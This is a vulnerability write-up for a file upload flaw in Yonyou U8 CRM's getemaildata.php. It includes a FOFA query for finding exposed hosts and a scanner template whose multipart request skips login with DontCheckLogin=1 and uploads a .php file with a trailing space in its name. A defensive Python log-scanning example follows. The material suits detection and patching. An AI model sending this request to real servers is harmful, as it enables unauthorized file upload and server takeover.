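Vulnerability Description
The getemaildata.php file in the Yonyou U8 CRM customer relationship management system has an arbitrary file upload vulnerability. An attacker can use it to gain server privileges and attack the server.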
FOFA: body="用友U8CRM"
id: yonyou-u8-crm-getemaildata-uploadfile
info:
  name: 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器
    FOFA: body="用友U8CRM"
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/用友OA/用友%20U8%20CRM客户关系管理系统%20getemaildata.php%20任意文件上传漏洞.html
  tags: yonyou,fileupload
  created: 2023/08/13
set:
  randstr: randomLowercase(8)
  randbody: randomLowercase(30)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /ajax/getemaildata.php?DontCheckLogin=1
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php \"\r\n\
        Content-Type: text/plain\r\n\
        \r\n\
        {{randbody}}\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        "
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"success":true') &&
      response.body.bcontains(b'.tmp.mht"') &&
      response.body.bcontains(b'"filePath":')
expression: r0()
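
A defender-side check built from the request shape in the template above (a POST to /ajax/getemaildata.php carrying the DontCheckLogin parameter), as an added example that is not part of the original template: it scans web access logs for matching requests so they can be triaged. The combined log format, the case-insensitive matching, the function names and the sample log lines are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Aug/2023:10:01:02 +0800] "POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1" 200 187 "-" "curl/8.0"
198.51.100.4 - - [13/Aug/2023:10:02:10 +0800] "GET /ajax/getemaildata.php?id=3 HTTP/1.1" 200 912 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Aug/2023:10:03:44 +0800] "POST /AJAX/GetEmailData.php?a=1&dontchecklogin=1 HTTP/1.1" 200 190 "-" "curl/8.0"
192.0.2.9 - - [13/Aug/2023:10:05:00 +0800] "POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1" 404 0 "-" "python-requests/2.31"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

ENDPOINT = "/ajax/getemaildata.php"   # path from the template's request
BYPASS_PARAM = "dontchecklogin"       # query parameter from the template


def find_upload_probes(log_text):
    """Return one record per POST to the endpoint that sets the bypass parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        # Assumption: compare case-insensitively so mixed-case variants are not missed.
        if unquote(url.path).lower() != ENDPOINT:
            continue
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if BYPASS_PARAM not in params:
            continue
        hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"])})
    return hits


def sources_needing_triage(hits):
    """Source IPs that received a 200, the status the template treats as a match."""
    return sorted({h["ip"] for h in hits if h["status"] == 200})


if __name__ == "__main__":
    for hit in find_upload_probes(SAMPLE_LOG):
        print(hit)
    print("triage:", sources_needing_triage(find_upload_probes(SAMPLE_LOG)))
```

An access log carries only the status code, so a 200 here is a reason to inspect the response and the upload directory, not proof that a file was written.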